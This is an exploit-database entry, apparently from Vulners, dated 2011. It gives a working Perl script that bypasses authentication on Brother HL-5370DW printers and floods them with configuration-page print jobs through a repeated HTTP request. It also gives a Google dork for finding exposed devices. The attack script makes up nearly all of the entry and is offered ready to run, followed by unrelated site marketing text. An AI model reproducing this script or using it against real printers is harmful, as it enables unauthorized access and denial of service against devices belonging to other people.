# Exploit Title: Brother HL-5370DW series auth bypass printer flooder
# Google Dork: Copyright(C) 2000-2009 Brother Industries, Ltd. All Rights Reserved. Brother HL-5370DW series
# Date: 31/05/2011
# Author: chrisB
# Contact : chrisb [@) gmx.fr
# Version: Brother HL-5370DW series
#!/usr/bin/perl
use LWP::Simple;
usage() unless $ARGV[1];
$replace = 'post/panel.html?EXECUTE2=PRTCONFIG';
$hint = $ARGV[1];
$goodurl = $ARGV[0];
$success = 0;
$goodurl =~ s/main.html/$replace/;
for ($count = $hint + 1; $count >= 1; $count--) {
$contents = get($goodurl);
if($contents =~ m/acknowledged/i)
{
$success++;
print "success\n";
}
else
{
print "error, busy or no more paper\n";
}
}
print "pages printed : $success \r\n";
sub usage
{
print qq( Brother HL-5370DW series auth bypass printer flooder
Usage: perl $0 [http://url.fr/printer/main.html] [hints]
) and exit;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation